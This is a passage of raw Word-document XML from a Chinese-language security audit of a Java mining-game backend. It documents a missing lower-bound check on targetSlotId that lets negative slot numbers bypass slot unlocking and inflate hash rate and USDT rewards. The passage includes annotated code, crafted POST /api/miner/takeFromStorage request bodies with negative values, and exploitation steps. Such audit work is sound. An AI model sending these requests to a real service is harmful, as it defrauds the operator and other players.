        <w:t>MinerController.java.sell → MinerService.java.sell → RedisMiningBalanceCache.java.invalidate → RedisMiningBalanceCache.java.balanceKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.sell → MinerService.java.sell → MinerService.java.resolveMinerToSell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audit_m148_549_sell_ctrl-path6of8.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m148_557_sell_ctrl-path7of8.md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：MinerService.java#isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_21" w:id="21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞20：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 缺少下界校验 —— 负数坑位绕过槽位解锁限制</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="433"/>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 xml:space="preserve">：负数 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 绕过坑位解锁机制，激活无限矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="434"/>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src/main/java/com/gameBack/mjservice/service/MinerService.java:isSlotUnlocked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="435"/>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：业务逻辑绕过 / 访问控制缺失</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="436"/>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437"/>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：普通用户（需登录）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="438"/>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isSlotUnlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 方法使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId &lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 来判断坑位是否可用（设计意图为坑位 1-6 免费开放，7 及以上需解锁），但该条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>没有下界约束</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0</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 xml:space="preserve"> 乃至任意负整数均满足 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;= 6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，均被视为"已解锁"。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者只需将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为任意负整数（如 </w:t>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">……），即可将任意矿机从存放处取出并放入不存在的"负坑位"。这些矿机的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段被置为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，而 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 查询所有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的矿机时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>不过滤 `slotId` 范围</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，因此这些矿机会被完整纳入算力计算。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>由于负坑位理论上无限多（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Integer.MIN_VALUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 到 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），攻击者可以将存放处全部矿机激活，彻底突破游戏的坑位限制设计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="439"/>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POST /api/miner/takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 由用户完全控制）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerService.takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅检查非空）→ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isSlotUnlocked(userId, targetSlotId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对负值直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 矿机 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 置 0 并以负值 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 存库 → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>recalcUserLevelAndHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>computeBaseTotalHashRate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（全量扫描 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的矿机，含负坑位矿机）→ 算力被无限叠加</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="440"/>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441"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>所有存放处矿机可全部激活，算力无上限膨胀</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="442"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>若算力与 USDT/游戏资产挂钩（如哈希挖矿收益），可直接放大收益</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="443"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">激活高等级矿机可触发 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，额外获取升级 USDT 奖励</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TakeFromStorageForm 可控字段：</w:t>
              <w:br/>
              <w:t>//   Long minerId;         ← 矿机ID</w:t>
              <w:br/>
              <w:t>//   Integer targetSlotId; ← 目标坑位，攻击者完全控制，可传 -1/-99 等负值</w:t>
              <w:br/>
              <w:t>@PostMapping("/takeFromStorage")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;UserMiner&gt; takeFromStorage(@CurrentUserId Long userId,</w:t>
              <w:br/>
              <w:t xml:space="preserve">        @RequestBody TakeFromStorageForm form) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success(</w:t>
              <w:br/>
              <w:t xml:space="preserve">        minerService.takeFromStorage(userId, form.getMinerId(), form.getTargetSlotId())); // ← targetSlotId=-1 传入</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Service 层：MinerService.java — takeFromStorage</w:t>
              <w:br/>
              <w:t>public UserMiner takeFromStorage(Long userId, Long minerId, Integer targetSlotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (minerId == null || targetSlotId == null) {      // ← 仅检查非空，无范围校验</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("矿机ID与目标坑位不能为空");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!isSlotUnlocked(userId, targetSlotId)) {        // ← targetSlotId=-1 传入 sink</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位未解锁");</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (userMinerRepository.findByUserIdAndSlotIdAndInStorage(userId, targetSlotId, 0).isPresent()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        throw new IllegalArgumentException("目标坑位已被占用");  // ← 负坑位从未被占用，始终通过</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setInStorage(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    miner.setSlotId(targetSlotId);   // ← slotId 被设为负数，矿机标记为激活</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.save(miner);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    recalcUserLevelAndHashRate(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miner;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 漏洞 sink：MinerService.java — isSlotUnlocked</w:t>
              <w:br/>
              <w:t>public boolean isSlotUnlocked(Long userId, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (slotId &lt;= 6) return true;   // ← 漏洞点：-1 &lt;= 6 为 true，负坑位全部通过</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    return userSlotUnlockRepository.findByUserIdAn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>dSlotId(userId, slotId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(u -&gt; u.getIsUnlocked() != null &amp;&amp; u.getIsUnlocked() == 1)</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElse(false);</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 算力计算：MinerService.java — computeBaseTotalHashRate</w:t>
              <w:br/>
              <w:t>public BigDecimal computeBaseTotalHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← 查询所有 inStorage=0 的矿机，不过滤 slotId 范围</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← slotId=-1/-2/-99 的矿机同样被纳入计算</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return miners.stream()</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .map(m -&gt; { ... })</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .reduce(BigDecimal.ZERO, BigDecimal::add); // ← 负坑位矿机算力全部叠加</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&lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;已登录用户的有效Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;current_timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;unique_nonce&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;computed_hmac_signature&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"minerId": &lt;存放处矿机ID_1&gt;, "targetSlotId": -1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">重复发送，每次递减 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</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{"minerId": &lt;存放处矿机ID_2&gt;, "targetSlotId": -2}</w:t>
              <w:br/>
              <w:t>{"minerId": &lt;存放处矿机ID_3&gt;, "targetSlotId": -3}</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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="444"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用正常账号登录，获取有效 Bearer Token，并准备若干矿机（存放处）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="445"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>POST /api/miner/takeFromStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>targetSlotId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，将第一台矿机放入负坑位，请求通过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="446"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
